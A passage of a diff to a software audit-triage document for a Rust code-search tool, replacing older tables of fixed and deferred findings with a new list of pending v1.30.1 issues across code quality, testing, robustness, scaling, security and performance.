-| P2.68 | PF: reindex_files watch path bypasses global EmbeddingCache | Performance | `src/cli/watch.rs:2876-2887` | 📋 issue #1129 |
-| P2.69 | PF: wrap_value deep-clones entire payload via serde round trip | Performance | `src/cli/json_envelope.rs:160-176` | ✅ fixed |
-| P2.70 | PF: build_graph correlated subquery for n_callers — N rows × COUNT(*) | Performance | `src/serve/data.rs:234-264` | ✅ fixed (replaced per-row correlated subquery with `LEFT JOIN (SELECT callee_name, COUNT(*) ... GROUP BY)` — O(M+N) instead of O(N log M)) |
-| P2.71 | RM: Background HNSW rebuild thread detached — daemon shutdown can't wait | Resource Mgmt | `src/cli/watch.rs:965-1042` | ✅ fixed |
-| P2.72 | RM: pending_rebuild.delta grows unbounded during long rebuild | Resource Mgmt | `src/cli/watch.rs:611, 2667-2741` | ✅ fixed |
-| P2.73 | RM: LocalProvider::stash retains all submitted batch results until drop | Resource Mgmt | `src/llm/local.rs:74, 304-309, 542-547` | ✅ fixed (cap MAX_STASH_BATCHES=128; evict-oldest on insert) |
-| P2.74 | RM: Daemon never checks fs.inotify.max_user_watches — silently drops events | Resource Mgmt | `src/cli/watch.rs:1947-1949` | ✅ fixed |
-| P2.75 | RM: select_provider triggers CUDA probe + symlink for every CLI process | Resource Mgmt | `src/embedder/provider.rs:171-248` | ✅ fixed (Embedder.provider is now `OnceLock<ExecutionProvider>` resolved on first inference; `new_cpu` pre-populates) |
-| P2.76 | RM: serve handlers spawn_blocking unbounded — 512 thread × 10MB working set | Resource Mgmt | `src/serve/handlers.rs:86-89` + `mod.rs:92` | ✅ fixed (semaphore in `AppState.blocking_permits`, default 32, env-tunable via `CQS_SERVE_BLOCKING_PERMITS`; permit acquired before spawn_blocking and held by closure) |
-| P2.77 | RM: Embedder clear_session doubled-memory window invisible | Resource Mgmt | `src/embedder/mod.rs:261, 808-823` | ✅ fixed (logs `strong_count` when in-flight inference is mid-encode at clear time) |
-| P2.78 | TC-HAP: cqs serve data endpoints never tested with populated data | Test Coverage | `src/serve/data.rs` + `src/serve/tests.rs` | ✅ fixed (populated_fixture tests at serve/tests.rs:1007–1146) |
-| P2.79 | TC-HAP: 16 batch dispatch handlers have zero tests | Test Coverage | `src/cli/batch/handlers/{misc,graph,info}.rs` | ✅ fixed (8 new tests across graph/info/misc handlers + the pre-existing 7-test `dispatch_tests` mod cover the high-traffic surface: `dispatch_callers/callees/related/impact_diff` in `graph::tests`, `dispatch_stats` in `info::tests`, `dispatch_ping/help/refresh` in `misc::tests`) |
-| P2.80 | TC-HAP: Reranker::rerank/rerank_with_passages have no tests | Test Coverage | `src/reranker.rs:160, 190` | ✅ fixed (`test_rerank_empty_input_returns_empty` no-op shortcut + `#[ignore]`-gated `test_rerank_reorders_by_relevance` for the model-loading happy path) |
-| P2.81 | TC-HAP: cmd_project Search has no CLI integration test | Test Coverage | `src/cli/commands/infra/project.rs:70` | ✅ fixed (`tests/cli_project_search_test.rs` — XDG-isolated two-project search with assert_cmd, gated behind `slow-tests`) |
-| P2.82 | TC-HAP: cqs ref add/list/remove/update no end-to-end CLI test | Test Coverage | `src/cli/commands/infra/reference.rs` | ✅ fixed (`tests/cli_ref_test.rs` — round-trip add/list/remove/update coverage) |
-| P2.83 | TC-HAP: handle_socket_client no happy-path round-trip test | Test Coverage | `src/cli/watch.rs:160` | ✅ fixed (UnixStream-pair round-trip in `watch::adversarial_socket_tests` — seeds chunk, sends `stats` request, asserts `status:ok` envelope with numeric `total_chunks`) |
-| P2.84 | TC-HAP: spawn_hnsw_rebuild/drain_pending_rebuild ship with zero tests | Test Coverage | `src/cli/watch.rs spawn_hnsw_rebuild` | ✅ fixed (covered by P2.29 spawn_hnsw_rebuild tests + existing `drain_pending_rebuild_*` tests in watch::tests) |
-| P2.85 | TC-HAP: for_each_command! macro + 4 emitters have no behavioral tests | Test Coverage | `src/cli/registry.rs:61` | ✅ fixed (`variant_name_pins_critical_command_labels` + 3× `batch_support_*` tests in `definitions::tests` exercise the macro-emitted `variant_name()` and `batch_support()` impls) |
-| P2.86 | TC-HAP: build_hnsw_index_owned/build_hnsw_base_index — no direct tests | Test Coverage | `src/cli/commands/index/build.rs:848,880` | ✅ fixed (4 direct happy-path + empty-store tests added in `build::tests`) |
-| P2.87 | TC-HAP: hyde_query_pass and doc_comment_pass have zero tests | Test Coverage | `src/llm/hyde.rs:11`, `src/llm/doc_comments.rs:135` | ✅ fixed (`hyde_query_pass_returns_zero_for_empty_store`, `doc_comment_pass_returns_empty_for_empty_store` — local-provider config, empty-store short-circuit) |
-| P2.88 | EX: Adding third score signal touches two parallel fusion paths | Extensibility | `src/store/search.rs:182-229`, `src/search/query.rs:511-720` | 📋 issue #1130 |
-| P2.89 | EX: Vector index backend selection is hand-coded if/else; no IndexBackend trait | Extensibility | `src/cli/store.rs:423-540` | 📋 issue #1131 |
-| P2.90 | EX: ScoringOverrides knob → 4 sites; no shared resolver | Extensibility | `src/config.rs:153-172` + scoring | 📋 issue #1132 |
-| P2.91 | EX: NoteEntry has no kind/tag taxonomy — only sentiment | Extensibility | `src/note.rs:41-89` | 📋 issue #1133 |
-| P2.92 | RM: Embedder::new opens fresh QueryCache + 7-day prune on every CLI command | Resource Mgmt | `src/embedder/mod.rs:355-366` | ✅ fixed |
+| ID | Title | Category | Location | Effort | Status |
+|----|-------|----------|----------|--------|--------|
+| CQ-V1.30.1-3 | `cqs eval --require-fresh` Timeout error message omits drop/saturation signals | Code Quality | `src/cli/commands/eval/mod.rs:248-255` | easy | pending |
+| CQ-V1.30.1-5 | Three near-identical `ort_err` helpers across embedder/reranker/splade | Code Quality | embedder/reranker/splade modules | easy | pending |
+| CQ-V1.30.1-6 | Auth `--no-auth` warning at boot silent for localhost binds — duplicate warning logic | Code Quality | `src/cli/commands/serve.rs:27-37` | easy | pending |
+| DOC-V1.30.1-2 | README canonical command list omits `cqs hook` and `cqs status` (#1182 commands) | Documentation | `README.md:540-569` | easy | pending |
+| DOC-V1.30.1-3 | CONTRIBUTING Architecture Overview stale — missing eval/, watch_status.rs, daemon_translate.rs, etc | Documentation | `CONTRIBUTING.md:149-340` | easy | pending |
+| DOC-V1.30.1-5 | PRIVACY/SECURITY document only Linux path for query_log/query_cache (macOS/Windows missing) | Documentation | `PRIVACY.md:21-22`, `SECURITY.md:111-136` | easy | pending |
+| DOC-V1.30.1-6 | README "Watch Mode" section omits default `--wait-secs` budget (30 s) | Documentation | `README.md:219-220` | easy | pending |
+| DOC-V1.30.1-9 | v1.30.0 CHANGELOG/ROADMAP lists `cqs cache {stats,prune,compact}` missing `clear` (cosmetic) | Documentation | `CHANGELOG.md:71`, `ROADMAP.md:131` | easy | pending |
+| API-V1.30.1-2 | `--watch-fresh --wait-secs 30` vs `--require-fresh-secs 600` — same op, 20× different default | API Design | `definitions.rs:792-793`, `eval/mod.rs:85-86` | easy | pending |
+| API-V1.30.1-3 | `cqs eval --no-require-fresh` is the only `--no-X` flag in the CLI surface | API Design | `src/cli/commands/eval/mod.rs:79-80` | easy | pending |
+| API-V1.30.1-4 | `PingResponse.last_indexed_at` vs `WatchSnapshot.last_synced_at` — same field, two names | API Design | `daemon_translate.rs:236`, `watch_status.rs:105` | easy | pending |
+| API-V1.30.1-6 | `DaemonReconcileResponse.queued: bool` documented "always true" — useless field | API Design | `src/daemon_translate.rs:517-519` | easy | pending |
+| API-V1.30.1-7 | `WatchSnapshotInput::_marker: PhantomData<&'a ()>` is leaked private invariant | API Design | `src/watch_status.rs:181-193` | easy | pending |
+| API-V1.30.1-8 | `cqs status` (no flag) exits 1 — only mode is gated on a flag user can't avoid | API Design | `src/cli/commands/infra/status.rs:41-54` | easy | pending |
+| API-V1.30.1-9 | `FreshnessState` has `as_str()` but no `Display` — papercut for `format!`/`tracing::info!(state=%)` | API Design | `src/watch_status.rs:51-60` | easy | pending |
+| EH-V1.30.1-3 | `dispatch.rs:207` swallows slot-name validation errors via `.ok()` | Error Handling | `src/cli/dispatch.rs:207` | easy | pending |
+| EH-V1.30.1-4 | `doctor` silently treats `list_slots` failure as empty — diagnostic tool hides its diagnostic | Error Handling | `src/cli/commands/infra/doctor.rs:923` | easy | pending |
+| EH-V1.30.1-5 | `cqs index --json` envelope reports model="" / chunk_count=0 on resolution failure | Error Handling | `src/cli/commands/index/build.rs:863-867` | easy | pending |
+| EH-V1.30.1-6 | Reranker checksum-marker write silently dropped — re-verifies on every cold start | Error Handling | `src/reranker.rs:524` | easy | pending |
+| OB-V1.30.1-1 | "SPLADE routing" `tracing::info!` fires on every search call — journal spam at default | Observability | `src/search/router.rs:469-554` | easy | pending |
+| OB-V1.30.1-2 | `reclassify_with_centroid` info log per Unknown-gap fill — per-search spam | Observability | `src/search/router.rs:1146-1150` | easy | pending |
+| OB-V1.30.1-4 | `wait_for_fresh` polling loop returns without closing tracing event recording outcome+elapsed | Observability | `src/daemon_translate.rs:660-679` | easy | pending |
+| OB-V1.30.1-5 | `enforce_auth` 401 warn lacks rejection reason — three failure modes collapse to one log line | Observability | `src/serve/auth.rs:389-401, 269-321` | easy | pending |
+| OB-V1.30.1-7 | `daemon_reconcile` walk has no `elapsed_ms` field — pass duration unrecoverable | Observability | `src/cli/watch/reconcile.rs:63-148` | easy | pending |
+| TC-ADV-1.30.1-1 | `AuthToken::try_from_string` has no upper-bound length check, no length test | Test Coverage (adv) | `src/serve/auth.rs:123-129` | easy | pending |
+| TC-ADV-1.30.1-2 | `check_request` ambiguous-channel collision tests (cookie+query) missing | Test Coverage (adv) | `src/serve/auth.rs:269-321` | easy | pending |
+| TC-ADV-1.30.1-3 | `check_request` Bearer-prefix grammar gaps unpinned (`bearer`, double-space, no-space) | Test Coverage (adv) | `src/serve/auth.rs:271-280` | easy | pending |
+| TC-ADV-1.30.1-7 | `env_disables_freshness_gate` test re-implements function inline — never calls it | Test Coverage (adv) | `src/cli/commands/eval/mod.rs:282-290, 405-432` | easy | pending |
+| TC-ADV-1.30.1-8 | `WatchSnapshot::compute` `delta_saturated=true, pending=0` reports Fresh — no test | Test Coverage (adv) | `src/watch_status.rs:199-223` | easy | pending. Notes: covered by CQ-V1.30.1-2 fix. |
+| TC-ADV-1.30.1-9 | `daemon_status` non-`ok` envelope with null/number `message` returns `daemon error: daemon error` | Test Coverage (adv) | `src/daemon_translate.rs:487-499` | easy | pending |
+| TC-ADV-1.30.1-10 | `unwrap_dispatch_payload` accepts missing `data` field — passes wrapper through as payload | Test Coverage (adv) | `src/daemon_translate.rs:387-404` | easy | pending |
+| RB-2 | `wait_for_fresh` panics on `Instant + Duration::from_secs(u64::MAX)` if any caller skips cap | Robustness | `src/daemon_translate.rs:660-662` | easy | pending |
+| RB-3 | `as_secs() as i64` SystemTime cast pattern landed in 5 new locations post-RB-V1.30-3 | Robustness | watch_status, batch, ping, watch/mod | easy | pending |
+| RB-4 | `as_millis() as i64` cast in reindex pipeline truncates u128 to i64 silently | Robustness | `src/cli/watch/reindex.rs:507-508` | easy | pending |
+| RB-5 | `migrate_legacy` sentinel read uses unbounded `fs::read_to_string` (RB-V1.30-2 sibling) | Robustness | `src/slot/mod.rs:656` | easy | pending |
+| RB-7 | Atomic `as u64`/`as i64` casts in WatchSnapshot trust unbounded usize from caller | Robustness | `src/watch_status.rs:213-218` | easy | pending |
+| RB-8 | `print_text_report::pct` on empty eval set → division by zero / NaN bleeds into report | Robustness | `src/cli/commands/eval/mod.rs:296-309` | medium | pending |
+| SHL-V1.30-2 | `wait_for_fresh` poll interval hardcoded at 250 ms — no env knob | Scaling | `src/daemon_translate.rs:663` | easy | pending |
+| SHL-V1.30-3 | `eval --require-fresh-secs` silently capped to 600 s inside the wait helper | Scaling | `src/cli/commands/eval/mod.rs:237` | easy | pending |
+| SHL-V1.30-4 | `task::run_task` hardcodes BFS knobs (depth=2, max_nodes=100) overriding `CQS_GATHER_*` | Scaling | `src/task.rs:19-25, 143-149` | easy | pending |
+| SHL-V1.30-5 | `onboard` callee/caller fetch caps hardcoded at 30/15 — silent truncation | Scaling | `src/onboard.rs:30-33, 174-175` | easy | pending |
+| SHL-V1.30-6 | `MAX_REFERENCES = 20` hardcoded — no env knob, silent truncation past 20 | Scaling | `src/config.rs:390-405` | easy | pending |
+| SHL-V1.30-7 | `MAX_NOTES_FILE_SIZE = 10 MB` hardcoded twice + `MAX_NOTES = 10_000` silent truncation | Scaling | `src/note.rs:20, 169, 245` | easy | pending |
+| SHL-V1.30-8 | `ENRICHMENT_PAGE_SIZE = 500` hardcoded — no env knob | Scaling | `src/cli/enrichment.rs:46, 127` | easy | pending |
+| SHL-V1.30-9 | `LAST_INDEXED_PRUNE_SIZE_THRESHOLD = 5_000` "intentionally not env" — but `cqs ref` exceeds | Scaling | `src/cli/watch/gc.rs:36-42` | easy | pending |
+| SHL-V1.30-10 | `daemon_periodic_gc_cap` env override is `OnceLock`-cached — `systemctl set-environment` ineffective | Scaling | `src/cli/watch/gc.rs:78-86` | easy | pending |
+| AC-V1.30.1-2 | `is_structural_query` keyword match is case-sensitive — `Class Foo` misroutes to Conceptual | Algorithm Correctness | `src/search/router.rs:813-816` | easy | pending |
+| AC-V1.30.1-6 | `wait_for_fresh` deadline math allows one over-budget poll on slow daemon (~30s slack) | Algorithm Correctness | `src/daemon_translate.rs:660-679` | easy | pending |
+| AC-V1.30.1-7 | `BoundedScoreHeap::push` score-equality uses `==` not `total_cmp` — bypass-prone | Algorithm Correctness | `src/search/scoring/candidate.rs:231` | easy | pending |
+| AC-V1.30.1-8 | `idle_secs` truncates sub-second freshness — first 9 ticks after event report 0 | Algorithm Correctness | `src/watch_status.rs:219` | easy | pending |
+| EX-V1.30.1-3 | `log_query` hand-sprinkled across 6 dispatch arms — should be a property of the command | Extensibility | `src/cli/batch/commands.rs` | easy | pending |
+| EX-V1.30.1-7 | Env-var falsy parsing hand-rolled in `eval/mod.rs`, not reused for 30+ other CQS_* env vars | Extensibility | `src/cli/commands/eval/mod.rs:282-289` | easy | pending |
+| PB-V1.30.1-2 | `--bind localhost` documented as valid but always fails `SocketAddr::parse` | Platform Behavior | `src/cli/commands/serve.rs:39-41` | easy | pending |
+| PB-V1.30.1-6 | `atomic_replace` opens parent dir on every Windows write — always fails, debug-spam | Platform Behavior | `src/fs.rs:90-108` | easy | pending |
+| PB-V1.30.1-8 | `cqs hook` reports use `\`-separated paths on Windows — every other JSON consumer expects `/` | Platform Behavior | `src/cli/commands/infra/hook.rs:99-105, 152, 354` | easy | pending |
+| PB-V1.30.1-10 | `restart_daemon_if_needed` Linux hardcodes `cqs-watch.service` — fails confusingly without unit | Platform Behavior | `src/cli/commands/infra/model.rs:710-738` | easy | pending |
+| SEC-V1.30.1-9 | `cqs ref add` ref dir 0o700 but parent `~/.local/share/cqs/refs/` inherits umask | Security | `src/cli/commands/infra/reference.rs:137-145` | easy | pending |
+| SEC-V1.30.1-10 | `cqs ref add` does not set 0o600 on index DB after writing — falls back to umask defaults | Security | `src/cli/commands/infra/reference.rs:165-178` | easy | pending |
+| PF-V1.30.1-4 | `run_daemon_reconcile` allocates fresh String per disk file via `replace('\\', "/")` even on Linux | Performance | `src/cli/watch/reconcile.rs:99` | easy | pending |
+| PF-V1.30.1-5 | `build_stats` issues 4 sequential `fetch_one` round-trips for what is one query | Performance | `src/serve/data.rs:1105-1128` | easy | pending |
+| PF-V1.30.1-6 | `enforce_auth` allocates two strings per HTTP request for cookie name + lookup needle | Performance | `src/serve/auth.rs:357, 292` | easy | pending |
+| PF-V1.30.1-7 | Watch reindex clones each `content_hash` String into Vec<String> for incremental HNSW | Performance | `src/cli/watch/reindex.rs:414-417` | easy | pending |
+| PF-V1.30.1-1 | Daemon publishes watch snapshot every 100ms with `fs::metadata(index_path)` syscall | Performance | `src/cli/watch/mod.rs:149-185, 1303` | easy | pending |
+| RM-1 | `daemon-client` thread_local `REQ_LINE` is no-op — daemon spawns fresh thread per accept | Resource Management | `src/cli/watch/socket.rs:91-99`, `daemon.rs:189-205` | easy | pending |
+| RM-3 | `compute_context` reads entire source file into RAM to extract N context lines | Resource Management | `src/cli/display.rs:59-99, 489` | easy | pending |
+| RM-6 | `serve` auth path allocates fresh `format!("{cookie_name}=")` per request | Resource Management | `src/serve/auth.rs:292` | easy | pending |
+| RM-7 | `check_request` cookie loop scans every `;`-separated pair — subsumed by RM-6 | Resource Management | `src/serve/auth.rs:287-300` | easy | pending. Notes: subsumed by RM-6. |
+| TC-HAP-1.30.1-1 | `cmd_install` upgrade-marker path never executed by any test | Test Coverage (happy) | `src/cli/commands/infra/hook.rs:149-200` | easy | pending |
+| TC-HAP-1.30.1-8 | `WatchSnapshot::compute` `Rebuilding` state entry untested through `compute()` | Test Coverage (happy) | `src/watch_status.rs` | easy | pending |
+| TC-HAP-1.30.1-9 | `print_text_report` row-by-row format unpinned — spec-compat guarantee unenforced | Test Coverage (happy) | `src/cli/commands/eval/mod.rs:296+` | easy | pending |
+| TC-HAP-1.30.1-10 | `daemon_reconcile` happy-path pinned but `args` payload (hook arguments) never observed | Test Coverage (happy) | `src/daemon_translate.rs:1102+`, `hook.rs:296-322` | easy | pending |
+| TC-HAP-1.30.1-5 | `wait_for_fresh` Stale → Fresh transition (realistic case) untested; only "fresh on first poll" pinned | Test Coverage (happy) | `src/daemon_translate.rs:660-679` | medium | pending |
+| TC-ADV-1.30.1-5 | Reconcile clock-skew (stored mtime in future) keeps file out of queue forever — no test | Test Coverage (adv) | `src/cli/watch/reconcile.rs:108-132` | medium | pending |
+| TC-ADV-1.30.1-6 | Reconcile `metadata()` Err silently maps to "leave to GC" — masks permission-denied stale state | Test Coverage (adv) | `src/cli/watch/reconcile.rs:116-127` | medium | pending. Notes: paired with EH-V1.30.1-7. |
+| TC-ADV-1.30.1-4 | `wait_for_fresh` daemon-dies-mid-poll path untested; partial-read / malformed JSON path untested | Test Coverage (adv) | `src/daemon_translate.rs:660-679` | medium | pending |
+| RM-4 | `build_hnsw_index_owned` accumulates 17 MB content_hash snapshot used only at swap | Resource Management | `src/cli/commands/index/build.rs:1110-1126`, `rebuild.rs:262-380` | medium | pending |
+| PB-V1.30.1-9 | `reconcile.rs:128` inserts non-normalized PathBuf — same-file Windows separator skew possible | Platform Behavior | `src/cli/watch/reconcile.rs:103, 128`, `events.rs:84, 109` | medium | pending |
 
-## P3 — Quick Wins
+## P4 — Hard or low impact (file as issues; trivial inline fixes welcome)
 
-| # | Title | Category | Location | Status |
-|---|-------|----------|----------|--------|
-| P3.1 | panic_message helper duplicated 4 ways across 3 modules | Code Quality | `src/cli/pipeline/mod.rs:223`, `src/store/mod.rs:1322`, etc. | ✅ fixed |
-| P3.2 | resolve.rs find_reference + resolve_reference_db duplicate "find by name" twice | Code Quality | `src/cli/commands/resolve.rs:26-57` | ✅ fixed |
-| P3.3 | slot::libc_exdev hardcodes 18 with stale comment — libc is workspace dep | Code Quality | `src/slot/mod.rs:640-647` | ✅ fixed |
-| P3.4 | DOC: enumerate_files doc claims gitignore only — also honors .cqsignore | Documentation | `src/lib.rs:542-547` | ✅ fixed |
-| P3.5 | pub use nl::* leaks dead generate_nl_with_call_context wrapper | API Design | `src/lib.rs:165` + `src/nl/mod.rs:43-59` | ✅ fixed |
-| P3.6 | cqs gather --expand vs --expand-parent flag-name collision | API Design | `src/cli/args.rs:GatherArgs::expand` | ✅ fixed |
-| P3.7 | cqs eval --save accepts path with no .json validation | API Design | `src/cli/commands/eval/mod.rs:EvalCmdArgs::save` | ✅ fixed |
-| P3.8 | OB: cqs eval runner uses eprintln! for progress instead of tracing | Observability | `src/cli/commands/eval/runner.rs:163-168` | ✅ fixed |
-| P3.9 | OB: nl/mod.rs public NL generators have zero spans | Observability | `src/nl/mod.rs:43,65,189,209` | ✅ fixed |
-| P3.10 | OB: embed_documents/embed_query lack completion fields (result.len, dim, time) | Observability | `src/embedder/mod.rs:683,722` | ✅ fixed |
-| P3.11 | OB: Reranker::rerank_with_passages swallows length mismatch silently | Observability | `src/reranker.rs:200-220` | ✅ fixed |
-| P3.12 | OB: train_data git wrappers don't log non-zero exit codes | Observability | `src/train_data/git.rs:65-242` | ✅ fixed |
-| P3.13 | OB: format-string-interpolated tracing::info! at 9 sites — fields lost | Observability | `src/hnsw/build.rs:78,236` + 7 sites | ✅ fixed |
-| P3.14 | OB: cluster_2d emits no warn when corpus has chunks but zero UMAP rows | Observability | `src/serve/data.rs:901, 1020` | ✅ fixed |
-| P3.15 | TC-ADV: validate_slot_name accepts leading-dash / trailing-dash names | Test Coverage (adv) | `src/slot/mod.rs:159-178` | ✅ fixed |
-| P3.16 | TC-ADV: provider.rs ort_runtime_search_dir untested for malformed cmdline | Test Coverage (adv) | `src/embedder/provider.rs:67-123` | ✅ fixed |
-| P3.17 | TC-ADV: blake3_hex_or_passthrough uppercase/short-hex edges untested | Test Coverage (adv) | `src/cache.rs:709-721` | ✅ fixed |
-| P3.18 | RB: SystemTime → i64 cache cast wraps in 2554 | Robustness | `src/cache.rs:349-352, 551-555` | ✅ fixed |
-| P3.19 | RB: libc_exdev hardcodes 18 — wrong on Windows (ERROR_NOT_SAME_DEVICE=17) | Robustness | `src/slot/mod.rs:644-647` | ✅ fixed |
-| P3.20 | RB: cache prune --older-than DAYS computes negative cutoff for huge values | Robustness | `src/cache.rs:548, 551-555` | ✅ fixed |
-| P3.21 | RB: serve/data.rs i64.max(0) as u32 grew to 8 sites (was 3) | Robustness | `src/serve/data.rs` (8 sites) | ✅ fixed |
-| P3.22 | RB: Daemon socket-thread join detaches on timeout but logs "joined cleanly" | Robustness | `src/cli/watch.rs:2374-2400` | ✅ fixed |
-| P3.23 | SHL: diff EMBEDDING_BATCH_SIZE=1000 doesn't scale with model dim | Scaling | `src/diff.rs:158` | ✅ fixed |
-| P3.24 | SHL: Daemon worker_threads=min(num_cpus,4) hardcoded — caps large machines | Scaling | `src/cli/watch.rs:115-119` | ✅ fixed |
-| P3.25 | SHL: train_data MAX_SHOW_SIZE=50MB hardcoded — silent skip on big files | Scaling | `src/train_data/git.rs:167` | ✅ fixed |
-| P3.26 | EX: BatchCmd::is_pipeable is a separate match outside command registry | Extensibility | `src/cli/batch/commands.rs:325-538` | 📋 issue #1137 |
-| P3.27 | EX: LlmProvider resolver hand-codes 2 providers — no registry | Extensibility | `src/llm/mod.rs:200-398` | 📋 issue #1138 |
-| P3.28 | EX: Tree-sitter query files no startup self-test (registry consistency) | Extensibility | `src/language/queries/*.scm` | ✅ fixed |
-| P3.29 | EX: find_project_root markers list hardcoded — could be data | Extensibility | `src/cli/config.rs:155-162` | ✅ fixed |
-| P3.30 | EX: structural_matchers per-language fn — no shared library | Extensibility | `src/language/mod.rs:191,345` | 📋 issue #1139 |
-| P3.31 | EX: Embedder constructor no per-preset extras hook | Extensibility | `src/embedder/models.rs:163-300` | 📋 issue #1140 |
-| P3.32 | PB: EmbeddingCache/QueryCache hardcode ~/.cache/cqs on Windows | Platform | `src/cache.rs:80-84, 1399-1403` | ✅ fixed |
-| P3.33 | PB: dispatch_drift/diff JSON file fields use display() in suggest.rs/types.rs | Platform | `src/suggest.rs:101`, `src/store/types.rs:220` | ✅ fixed |
-| P3.34 | PB: find_ld_library_dir splits on `:` — no Windows arm | Platform | `src/embedder/provider.rs:115-123` | ✅ fixed |
-| P3.35 | PB: index.lock advisory on Linux but mandatory on Windows; doc gap | Platform | `src/cli/files.rs:120-213` | ✅ fixed |
-| P3.36 | PB: is_wsl_drvfs_path misses //wsl.localhost and uppercase mounts | Platform | `src/config.rs:92-101` | ✅ fixed |
-| P3.37 | PB: blame git_file = replace('\\', "/") — Windows verbatim prefix slips through | Platform | `src/cli/commands/io/blame.rs:113-115` | ✅ fixed |
-| P3.38 | PB: daemon_socket_path falls back to temp_dir silently — log differing trust | Platform | `src/daemon_translate.rs:179-188` | ✅ fixed |
-| P3.39 | DS: write_slot_model/write_active_slot skip parent-dir fsync after rename | Data Safety | `src/slot/mod.rs:237-406` | ✅ fixed |
-| P3.40 | DS: update_umap_coords_batch uses TEMP TABLE shared across calls | Data Safety | `src/store/chunks/crud.rs:392-450` | ✅ fixed |
-| P3.41 | PF: reindex_files allocates N empty Embedding placeholders | Performance | `src/cli/watch.rs:2918-2924` | ✅ fixed |
-| P3.42 | PF: prepare_for_embedding always issues store-cache query even on full global hit | Performance | `src/cli/pipeline/embedding.rs:64-82` | ✅ fixed |
-| P3.43 | PF: Daemon socket walks args array twice (validation + extraction) | Performance | `src/cli/watch.rs:266-297` | ✅ fixed |
-| P3.44 | PF: build_graph edge-dedup HashSet keys clone (file,caller,callee) per row | Performance | `src/serve/data.rs:367-373` | ✅ fixed |
-| P3.45 | PF: extract_imports HashSet<String> allocates per candidate even on duplicate | Performance | `src/where_to_add.rs:258-276` | ✅ fixed |
-| P3.46 | PF: Watch reindex cached embedding clone via .get instead of .remove | Performance | `src/cli/watch.rs:2879-2887` | ✅ fixed |
-| P3.47 | RM: LocalProvider worker threads use default 2MB stack — 128MB at concurrency=64 | Resource Mgmt | `src/llm/local.rs:163-256` | ✅ fixed (partial: ceiling reduced 64→16; per-worker stack_size deferred — requires lifting workers out of `thread::scope` since `Scope::spawn` lacks a stack-size hook) |
-| P3.48 | RM: LocalProvider::http no pool_max_idle / idle_timeout | Resource Mgmt | `src/llm/local.rs:97-100` | ✅ fixed |
-| P3.49 | TC-HAP: cmd_similar (CLI) has no integration test | Test Coverage | `src/cli/commands/search/similar.rs:41` | ✅ fixed (already covered by `tests/cli_similar_test.rs` — TC-HAP-1.29-7 envelope shape + self-exclusion + unknown-name error) |
-| P3.50 | TC-HAP: cmd_ci happy path untested; only error paths tested | Test Coverage | `src/cli/commands/review/ci.rs:9` | ✅ fixed (already covered by `tests/cli_train_review_test.rs::test_ci_happy_path_non_empty_diff_emits_full_report`) |
-| P3.51 | TC-HAP: cmd_gather (CLI) untested; only library gather() tested | Test Coverage | `src/cli/commands/search/gather.rs:77` | ✅ fixed (already covered by `tests/cli_gather_test.rs` — TC-HAP-1.29-9 envelope + token-budget) |
-| P3.52 | TC-HAP: dispatch_line no happy-path test for valid command | Test Coverage | `src/cli/batch/mod.rs:557` | ✅ fixed (added `test_dispatch_line_stats_emits_success_envelope_shape`) |
-| P3.53 | TC-HAP: select_provider/detect_provider untested (#1120 split) | Test Coverage | `src/embedder/provider.rs:171-258` | ✅ fixed (added `tests` mod with `select_provider_caches_first_call`, `detect_provider_returns_valid_variant`, `execution_provider_is_debug_and_copy`) |
-
-## P4 — Defer / Issues
-
-| # | Title | Category | Location | Disposition | Status |
-|---|-------|----------|----------|-------------|--------|
-| P4.1 | AuthToken::from_string cfg-gated, alphabet invariant relies on docstring | Security | `src/serve/auth.rs:75-78, 218` | issue (hardening) | 📋 issue #1134 |
-| P4.2 | Path=/ cookie scope on 127.0.0.1 — multiple cqs serve on same host stomp | Security | `src/serve/auth.rs:211-214` | issue (browser cookie limit) | 📋 issue #1135 |
-| P4.3 | Auth state ignored by quiet=true — Option<AuthToken> permits silent no-auth | Security | `src/serve/mod.rs:78-83` | issue (type-state refactor) | 📋 issue #1136 |
-
-## Summary
-
-- **P1: 21 findings** — biggest themes:
-  - Docs lying about security/privacy (query_log opt-in, query_cache TTL, registry/dispatch contributor docs, project registry path)
-  - Auth token leakage (TraceLayer span URI, journald banner, missing-Host bypass)
-  - Critical defaults misleading users (gather "200" warning, reranker config ignored, embedder fingerprint cache thrash)
-  - Single-line wiring bugs (LocalProvider mutex poison loses results, name_boost sign-flip, token_pack break-vs-continue, drain_pending_rebuild dedup)
-  - Observability "off" by default — 150 spans invisible until OB-V1.30-1 lands
-- **P2: 92 findings** — biggest themes:
-  - Determinism / tie-break gaps in 8+ sort sites (semantic_diff, bfs_expand, contrastive_neighbors, doc_comments, map_hunks, related, etc.)
-  - Cross-slot data-safety issues stemming from #1105 (slot TOCTOU, fingerprint fallback, evict/write race, schema purpose conflation)
-  - Untested v1.30.0 surfaces (#1113 HNSW rebuild, #1114 registry, #1118 auth, #1120 provider split, serve data endpoints, batch dispatch handlers, LLM passes)
-  - Config/JSON contract drift (--json absent on init/index/convert/refresh; list shapes inconsistent; cache stats unit mix)
-  - Resource-management leaks introduced in v1.30.0 (detached rebuild thread, pending.delta unbounded, LocalProvider stash, eager QueryCache open, eager CUDA probe)
-- **P3: 53 findings** — biggest themes:
-  - Observability convention drift (eprintln, format-string interpolation, missing completion fields, missing spans on hot fns)
-  - Platform/Windows refinements (cache paths, path normalization, EXDEV constant, WSL UNC paths, mtime FAT32)
-  - Performance micro-opts (allocator churn, unnecessary clone, double-pass scans, correlated subquery on small budget)
-  - Adversarial test additions for newly-shipped surfaces
-- **P4: 3 findings** — biggest themes:
-  - Auth/security hardening that requires type-state refactors or cookie scope changes browser-wide
-  - All three are tracking-issue material; no inline triv
-
-## Cross-cutting Observations
-
-- **Docs lying is concentrated in the v1.30.0 release surface.** PRIVACY/SECURITY/CHANGELOG/CONTRIBUTING/README each have ≥1 P1 lie (query_log opt-in, query_cache TTL, CQS_LLM_ENDPOINT, dispatch.rs procedure, project registry path). Each is an easy text fix; together they indicate the v1.30.0 release notes pass (#1122) didn't cross-check against actual code paths.
-- **Mutex/error-handling silent-failure pattern recurs across LocalProvider (#1101).** RB-V1.30-1 (unbounded body), RB-V1.30-7 (auth_attempts mutex unwrap), TC-ADV-1.30-1 (body DoS), EH (Mutex::into_inner unwrap_or_default loses batch results), and the silent fetch_batch_results empty-on-missing all stem from the same "build this fast for #1101 ship date" pattern. A focused PR to harden LocalProvider would close 5+ findings.
